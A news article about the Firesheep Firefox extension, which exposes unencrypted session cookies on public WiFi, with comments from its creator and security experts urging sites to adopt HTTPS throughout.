This week there has been plenty of online discussion about a Mozilla Firefox extension that allows cookie data to be revealed in clear text.
Named Firesheep, it is free, open source and available now for Mac OS X and Windows, with Linux support on the way. It was described by Veracode CTO Chris Wysopal as 'to clear text web sessions as chainsaws are to trees, everyone gets to be a lumberjack'.
According to its creator Eric Butler, the software was downloaded 129,000 times in the first day of its announcement and it became a top ten trending topic on Google and Twitter. Butler, who describes himself as a freelance web application and software developer from Seattle, Washington, said that the coverage regarding harvesting credentials over public WiFi networks was very welcome and the real story was not the success of Firesheep but the fact that something like it is even possible.
He said: “The same can be said for the recent news that Google Street View vehicles were collecting web traffic. It should not be possible for Google or anybody to collect this data, whether intentional or not. Going forward the metric of Firesheep's success will quickly change from amount of attention it gains, to the number of sites that adopt proper security. True success will be when Firesheep no longer works at all.
“An across-the-board improvement in website security will take time, but people are beginning to see the risks of using insecure websites right now. Unfortunately there has been a lot of misinformation about what people can do to protect themselves.”
Basically, Firesheep can be used for sniffing HTTP sessions that are unencrypted and can be used for hijacking online services that require a login. The plug-in makes it possible for an interested party to impersonate users by hijacking their sessions.
Robert Chapman, CEO of Firebrand Training, said: "Firesheep demonstrates how trusting the general public can be. It is more concerning how it demonstrates how easy it is to abuse that trust."
Tom Ilube, co-founder of online identity company Garlik, commented that while the Firesheep extension was written in the hope of prompting major sites such as Facebook, Twitter and webmail providers to ensure that all of their services are provided over HTTPS, the ease with which it can be used will surely now put more people at risk
Luis Corrons, technical director of PandaLabs, commented that many people will be familiar with the dangers of connecting through public WiFi, as anyone could be sniffing the traffic and capture the data.
He said: “Don't panic. Yes, this is bad, but there are some countermeasures to take. The best solution would be to use SSL encryption in all communications, but this has to be supported in the server side, so that won't be happening (at least massively) anytime soon. Meanwhile, you should use HTTPS Everywhere, which will force you to use HTTPS when connecting to some major websites.”
Paul Ducklin, head of technology at Sophos, called this a 'campaign to push website operators towards encryption everywhere'. He said: "You can debate the morality of Butler's open publication and promotion of his session-hijacking software all you like, but he makes a clear and important point. (Just don't access anyone else's account with his software, even for fun.)
“Many websites, notably those which allow you to access and use any sort of personalised information, or to perform online activities for which you might be held accountable, are short-changing you by using HTTPS only at the start of your session. They should use secure HTTP throughout, protecting both the personal data you choose to upload and download, and the authentication token they use to identify you.
“There are some reasonable exceptions to full-time HTTPS - for example if a site uses a login merely to limit access to its own unpersonalised intellectual property, such as software downloads or news articles. In general, however, an SSL login should be followed by an SSL session.”
He said that the traditional excuse for not using encryption everywhere is that SSL, the cryptographic layer of HTTPS, is expensive. There are two responses: firstly, so what? It is cheaper to avoid any form of security for your customers; and secondly, says who? Google claims it has enabled HTTPS for all aspects of its Gmail service without adding any extra processing power.
Facebook said that its login process used SSL technology, however the entire site is not encrypted and when you enter your username and password, Facebook checks the information via a cookie that is not encrypted.
Nick O'Neill, writing on the allfacebook.com blog, said: “This is not a problem when you are on a secure network. However, when you are on an open WiFi network, it means that anyone else on the same network can spoof the cookie and login as you. As far as Facebook is concerned, they are seeing the same cookie coming from the same IP address.”
He approached Facebook about this, and a spokesman said it was working on adding SSL access to Facebook as an option, but generally would advise people not to send sensitive information from a public network. A statement said: “We have been making progress testing SSL access to Facebook and hope to provide it as an option in the coming months. As always, we advise people to use caution when sending or receiving information over unsecured WiFi networks. This tip and others can be found on the Facebook security page.
“Be careful about the information you access or send from a public wireless network. To be on the safe side, you may want to assume that other people can access any information you see or send over a public wireless network. Unless you can verify that a hotspot has effective security measures in place, it may be best to avoid sending or receiving sensitive information over that network.”
If this incident, which I predict will not be going away any time soon, does achieve one thing in promoting the use of encrypted sessions and a greater awareness of how data is used on a public network, then this will be seen as a successful venture, However if this is snapped up by the black hats there could be questions to be answered by the developers.